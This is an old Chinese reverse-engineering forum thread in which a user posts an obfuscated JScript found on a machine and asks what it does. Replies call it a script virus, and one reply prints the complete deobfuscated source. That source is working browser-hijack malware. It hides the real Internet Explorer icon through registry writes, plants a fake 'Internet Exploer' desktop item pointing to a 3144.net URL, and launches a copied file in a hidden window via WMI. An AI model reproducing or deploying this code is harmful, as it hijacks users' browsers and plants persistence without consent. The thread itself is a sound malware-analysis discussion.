首页
社区
课程
招聘
问答 CTF 排行榜 知识库 工具下载 看雪峰会 看雪商城 证书查询
  1. 看雪社区
  2. 软件逆向
    3. 发新帖
[讨论]都来看看这个流氓在干啥
2010-10-31 20:13 6973

[讨论]都来看看这个流氓在干啥

BlueT 活跃值
2
2010-10-31 20:13
6973
看了半天也没看出名堂来,会这个说说看,这流氓在干啥:

//815465573

//___C:\Program Files\Internet Explorer\Iexplore.exe___
//____http://3144.net/?tt____

eval(function(p,a,c,k,e,r){e=function(c){return(c<62?'':e(parseInt(c/62)))+((c=c%62)>35?String.fromCharCode(c+29):c.toString(36))};if('0'.replace(0,e)==0){while(c--)r[e(c)]=k[c];k=[function(e){return r[e]||e}];e=function(){return'([02-9dh-pr-zABF-OQ-Z]|1\\w)'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('0 n,o;WshShell=h i("9.6");0 y=p(){0 z=9.ScriptFullName;0 f=o.OpenTextFile(z,1);0 r=f.ReadAll();0 A=/B(.*?)B/F;0 G=/H(.*?)H/F;0 a=\'\',b=\'\';I(A.J(r)){a=K.$1;a=a.replace(/\\\\/g,"\\\\\\\\");0 _fkurl="";I(G.J(r)){b=K.$1;3{n.Run(\'"\'+a+\'" \'+b,1,false)}4(e){}}}};0 L=p(){n=h i(\'9.6\');o=h i(\'M.N\')};L();y();0 P=h i("9.6");0 q=h i("M.N");0 d=P.O("Templates");0 StartPath=P.O("AllUsersStartup");0 k=parseInt(Q.floor(Q.random()*9999));3{0 R="c:\\\\";0 OldPath=P.S;P.S=d;9.T(5000);q.CopyFile(R+"index.htm",d+"\\\\"+k);U(d+"\\\\"+k,d);9.T(60000);q.DeleteFile(d+"\\\\"+k)}4(E){};p U(V,W){0 X=12;0 Y=Z("11:{13=14}!\\\\\\\\.\\\\15\\\\16:win32_processstartup");0 s=Y.SpawnInstance_();s.ShowWindow=X;0 17="";0 18=Z("11:{13=14}!\\\\\\\\.\\\\15\\\\16:Win32_Process");18.Create(V,W,s,17)};0 2="{86AEFBE8-763F-0647-899C-A93278894D8E}";0 19="http://www.3144.net/?tt";3{P.5("1a\\\\1b\\\\t\\\\u\\\\v\\\\j\\\\1c\\\\NewStartPanel\\\\{1d-1e-1f-1g-1h}",1,"w")}4(e){};3{P.5("1a\\\\1b\\\\t\\\\u\\\\v\\\\j\\\\1c\\\\ClassicStartMenu\\\\{1d-1e-1f-1g-1h}",1,"w")}4(e){};3{P.5("7\\\\2\\\\"+2+"\\\\","l 1i","8")}4(e){};3{P.5("7\\\\2\\\\"+2+"\\\\DefaultIcon\\\\","C:\\\\1j 1k\\\\l j\\\\1l.m","8")}4(e){};3{P.5("7\\\\2\\\\"+2+"\\\\6\\\\","","8")}4(e){};3{P.5("7\\\\2\\\\"+2+"\\\\6\\\\D\\\\x\\\\","1m.m 1n.1o,1p 1q.1r","8")}4(e){};3{P.5("7\\\\2\\\\"+2+"\\\\6\\\\Open\\\\x\\\\","C:\\\\1j 1k\\\\l j\\\\1l.m "+19,"8")}4(e){};3{P.5("7\\\\2\\\\"+2+"\\\\6\\\\属性\\\\x\\\\","1m.m 1n.1o,1p 1q.1r","8")}4(e){};3{P.5("7\\\\2\\\\"+2+"\\\\1s\\\\1s","10","w")}4(e){};3{P.5("HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\t\\\\u\\\\v\\\\j\\\\Desktop\\\\NameSpace\\\\"+2+"\\\\","l 1i","8")}4(e){};',[],91,'var||CLSID|try|catch|RegWrite|Shell|HKEY_CLASSES_ROOT|REG_SZ|WScript||||TempPath||||new|ActiveXObject|Explorer|_0|Internet|exe|_ws|_sf|function||fc|objConfig|Microsoft|Windows|CurrentVersion|REG_DWORD|Command|RunLnkFile|sfn|_o1|___||||ig|_o2|____|if|test|RegExp|Init|Scripting|FileSystemObject|SpecialFolders||Math|dhead|CurrentDirectory|Sleep|CreateWin32|_1|_2|HIDDEN_WINDOW|WMI|GetObject||winmgmts||impersonationLevel|impersonate|root|cimv2|intProcessID|objProcess|URL|HKEY_CURRENT_USER|Software|HideDesktopIcons|871C5380|42A0|1069|A2EA|08002B30309D|Exploer|Program|Files|Iexplore|Rundll32|Shell32|dll|Control_RunDLL|Inetcpl|cpl|ShellFolder'.split('|'),0,{}))
//815465573

[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课

收藏
点赞0
打赏
分享
最新回复 (5)
BlueT
雪    币: 517
活跃值: (35)
能力值: ( LV6,RANK:90 )
在线值:
发帖
回帖
粉丝
私信
BlueT 2 2010-11-3 20:04
2
0
没人看出个名堂来哈?
loqich
雪    币: 962
活跃值: (1541)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
loqich 2010-11-3 22:53
3
0
还不知道别人在干嘛就说别人是流氓。。。。。。。。无语啊。。。。。。。。。
dalao
雪    币: 1866
活跃值: (95)
能力值: ( LV4,RANK:50 )
在线值:
发帖
回帖
粉丝
私信
dalao 1 2010-11-4 02:34
4
0
vbs病毒吧!
应该是个锁ie的vbs
是昔流芳
雪    币: 116
活跃值: (25)
能力值: ( LV3,RANK:20 )
在线值:
发帖
回帖
粉丝
私信
是昔流芳 2010-11-4 05:47
5
0 
 var _ws,_sf;
 WshShell=new ActiveXObject("WScript.Shell");
 var RunLnkFile=function()
 {
   var sfn=WScript.ScriptFullName;
   var f=_sf.OpenTextFile(sfn,1);
   var fc=f.ReadAll();
   var _o1=/___(.*?)___/ig;
   var _o2=/____(.*?)____/ig;
   var a='',b='';
   if(_o1.test(fc))
   {
     a=RegExp.$1;
     a=a.replace(/\\/g,"\\\\");
     var _fkurl="";
     if(_o2.test(fc))
     {
       b=RegExp.$1;
       try
       {
         _ws.Run('"'+a+'"  '+b,1,false)
       }
       catch(e)
       {
         
       }
       
     }
     
   }
   
 }
 ;var Init=function()
 {
   _ws=new ActiveXObject('WScript.Shell');
   _sf=new ActiveXObject('Scripting.FileSystemObject')
 }
 ;Init();
 RunLnkFile();
 var P=new ActiveXObject("WScript.Shell");
 var q=new ActiveXObject("Scripting.FileSystemObject");
 var TempPath=P.SpecialFolders("Templates");
 var StartPath=P.SpecialFolders("AllUsersStartup");
 var _0=parseInt(Math.floor(Math.random()*9999));
 try
 {
   var dhead="c:\\";
   var OldPath=P.CurrentDirectory;
   P.CurrentDirectory=TempPath;
   WScript.Sleep(5000);
   q.CopyFile(dhead+"index.htm",TempPath+"\\"+_0);
   CreateWin32(TempPath+"\\"+_0,TempPath);
   WScript.Sleep(60000);
   q.DeleteFile(TempPath+"\\"+_0)
 }
 catch(E)
 {
   
 }
 ;function CreateWin32(_1,_2)
 {
   var HIDDEN_WINDOW=12;
   var WMI=GetObject("winmgmts:
   {
     impersonationLevel=impersonate
   }
   !\\\\.\\root\\cimv2:win32_processstartup");
   var objConfig=WMI.SpawnInstance_();
   objConfig.ShowWindow=HIDDEN_WINDOW;
   var intProcessID="";
   var objProcess=GetObject("winmgmts:
   {
     impersonationLevel=impersonate
   }
   !\\\\.\\root\\cimv2:Win32_Process");
   objProcess.Create(_1,_2,objConfig,intProcessID)
 }
 ;var CLSID="
 {
   86AEFBE8-763F-0647-899C-A93278894D8E
 }
 ";
 var URL="http://www.3144.net/?tt";
 try
 {
   P.RegWrite("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\HideDesktopIcons\\NewStartPanel\\
   {
     871C5380-42A0-1069-A2EA-08002B30309D
   }
   ",1,"REG_DWORD")
 }
 catch(e)
 {
   
 }
 ;try
 {
   P.RegWrite("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\HideDesktopIcons\\ClassicStartMenu\\
   {
     871C5380-42A0-1069-A2EA-08002B30309D
   }
   ",1,"REG_DWORD")
 }
 catch(e)
 {
   
 }
 ;try
 {
   P.RegWrite("HKEY_CLASSES_ROOT\\CLSID\\"+CLSID+"\\","Internet Exploer","REG_SZ")
 }
 catch(e)
 {
   
 }
 ;try
 {
   P.RegWrite("HKEY_CLASSES_ROOT\\CLSID\\"+CLSID+"\\DefaultIcon\\","C:\\Program Files\\Internet Explorer\\Iexplore.exe","REG_SZ")
 }
 catch(e)
 {
   
 }
 ;try
 {
   P.RegWrite("HKEY_CLASSES_ROOT\\CLSID\\"+CLSID+"\\Shell\\","","REG_SZ")
 }
 catch(e)
 {
   
 }
 ;try
 {
   P.RegWrite("HKEY_CLASSES_ROOT\\CLSID\\"+CLSID+"\\Shell\\D\\Command\\","Rundll32.exe Shell32.dll,Control_RunDLL Inetcpl.cpl","REG_SZ")
 }
 catch(e)
 {
   
 }
 ;try
 {
   P.RegWrite("HKEY_CLASSES_ROOT\\CLSID\\"+CLSID+"\\Shell\\Open\\Command\\","C:\\Program Files\\Internet Explorer\\Iexplore.exe "+URL,"REG_SZ")
 }
 catch(e)
 {
   
 }
 ;try
 {
   P.RegWrite("HKEY_CLASSES_ROOT\\CLSID\\"+CLSID+"\\Shell\\^'\\Command\\","Rundll32.exe Shell32.dll,Control_RunDLL Inetcpl.cpl","REG_SZ")
 }
 catch(e)
 {
   
 }
 ;try
 {
   P.RegWrite("HKEY_CLASSES_ROOT\\CLSID\\"+CLSID+"\\ShellFolder\\ShellFolder","10","REG_DWORD")
 }
 catch(e)
 {
   
 }
 ;try
 {
   P.RegWrite("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace\\"+CLSID+"\\","Internet Exploer","REG_SZ")
 }
 catch(e)
 {
   
 }
 ;
BlueT
雪    币: 517
活跃值: (35)
能力值: ( LV6,RANK:90 )
在线值:
发帖
回帖
粉丝
私信
BlueT 2 2010-11-4 18:45
6
0
谢谢,这样看就清楚多了。
游客
登录 | 注册 方可回帖
 回帖  表情 雪币赚取及消费
高级回复
返回